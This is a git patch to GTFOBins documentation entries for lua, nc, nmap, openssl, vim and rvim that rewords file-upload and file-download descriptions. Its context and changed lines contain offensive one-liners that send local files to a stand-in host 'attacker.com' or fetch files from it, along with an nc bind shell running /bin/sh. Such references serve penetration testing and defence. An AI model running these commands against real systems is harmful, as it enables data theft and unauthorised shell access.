From e969daf111b39a616e1ebbe409d093d12b7ffe0f Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 29 Jul 2019 16:41:49 +0200 Subject: [PATCH] Reword file upload/download descriptions --- _gtfobins/lua.md | 4 ++-- _gtfobins/nc.md | 4 ++-- _gtfobins/nmap.md | 8 ++++---- _gtfobins/openssl.md | 2 +- _gtfobins/rvim.md | 4 ++-- _gtfobins/vim.md | 4 ++-- 6 files changed, 13 insertions(+), 13 deletions(-) diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 17ff92f..6686bf5 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -27,7 +27,7 @@ functions: local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' file-upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. code: | RHOST=attacker.com RPORT=12345 @@ -42,7 +42,7 @@ functions: t:send(d); t:close();' file-download: - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed. code: | export LPORT=12345 diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index c5bb2ac..5b98c89 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -12,14 +12,14 @@ functions: LPORT=12345 nc -l -p $LPORT -e /bin/sh file-upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" file-download: - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | LPORT=12345 LFILE=file_to_save diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 49ae529..7374564 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -39,13 +39,13 @@ functions: end;c:close();f:close();' > $TF nmap --script=$TF file-upload: - - description: Send a file to a TCP port. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + - description: Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080. code: | RHOST=attacker.com RPORT=8080 LFILE=file_to_send nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com export RPORT=12345 @@ -61,14 +61,14 @@ functions: t:close();' > $TF nmap --script=$TF file-download: - - description: Fetch remote file sent to a local TCP port. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + - description: Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080. code: | RHOST=attacker.com RPORT=8080 TF=$(mktemp -d) LFILE=file_to_save nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | export LPORT=12345 export LFILE=file_to_save diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 3f0dc35..02a32e6 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -19,7 +19,7 @@ functions: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save - Send a file to a TCP port, transmission will be encrypted. + Send a local file via TCP. Transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345 diff --git a/_gtfobins/rvim.md b/_gtfobins/rvim.md index 4c4fb12..2da611b 100644 --- a/_gtfobins/rvim.md +++ b/_gtfobins/rvim.md @@ -56,7 +56,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() vim.command(":q!")' - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. code: | export RHOST=attacker.com export RPORT=12345 @@ -79,7 +79,7 @@ functions: else: import urllib as r r.urlretrieve(e["URL"], e["LFILE"]) vim.command(":q!")' - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. code: | export LPORT=12345 export LFILE=file_to_save diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md index 0d33dde..530c135 100644 --- a/_gtfobins/vim.md +++ b/_gtfobins/vim.md @@ -61,7 +61,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() vim.command(":q!")' - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export RHOST=attacker.com export RPORT=12345 @@ -84,7 +84,7 @@ functions: else: import urllib as r r.urlretrieve(e["URL"], e["LFILE"]) vim.command(":q!")' - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export LPORT=12345 export LFILE=file_to_save